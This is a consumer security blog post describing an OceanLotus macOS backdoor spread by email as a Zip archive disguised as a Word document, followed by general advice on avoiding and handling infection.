Malware in fake Word files
MacOS backdoor malware is being distributed in malicious emails.
Backdoors are ways for malware (or other unauthorized users) to get access to a computer or a network. They are difficult to detect for a normal user.
This particular backdoor may arrive as an archive file (Zip) disguised as a Word file (Doc).
The file appears as if its file type extension is “.doc”. A special character is used in its name that looks like a dot ‘.’. It’s a bit like a Homograph attack, actually.
The fake Word file uses the Word icon, too. It is trivial for cybercriminals to make files look like something less suspicious.
If this malicious file is opened, a script is executed and the Mac gets infected with the backdoor. Later on, this can result in worse infections.
Consequences of an infection
The researchers who found and described this backdoor say that it seems related to OceanLotus, which is a known backdoor that targets Macs.
This new OceanLotus collects system information and sends it off to the criminals responsible for this malware. It can also download files and execute code. The user of the infected computer might not notice anything wrong.
You can read more about this backdoor here: Trendmicro.com.
OceanLotus can install more malware on the system: info stealers, web traffic hijackers, etc. These types of malware (Shlayer trojan comes to mind) can cause all sorts of issues while browsing the web or using online applications. They can also be difficult to remove as they are very persistent. Network settings, configuration profiles, various files in the Library folders need to be found and deleted.
How to keep your Mac safe
While OceanLotus is not new, its new iterations can slip past even the best antivirus scanners. But if it does get detected, it’s flagged as Dropper, Trojan, BackDoor, Bash.Agent, Shell.Agent, and OceanLotus.
Here’re the scan results of the fake Word file that was discovered by the researchers: Virustotal.com.
OceanLotus gives us a reminder to stay vigilant and to be aware of malware threats:
- Use good antivirus software and keep it up-to-date. Over a few hours, new malware goes from being undetected to widely detected. This shows how important it is to update your anti-malware apps.
- Be suspicious of unprompted documents and other files arriving in your email. Spam email is a very popular infection method.
- Ask for advice. Any file type can contain malicious code in it. Documents, archives, even images. If you receive an unexpected email that requires you to download and open a file, you may want to contact your administrator and ask if it is safe to open.
- If your Mac was infected with malware, then shut it down or at least disconnect it from the internet. This way, the backdoor will not be able to exchange information with its Command & Control server to steal information or to download malware.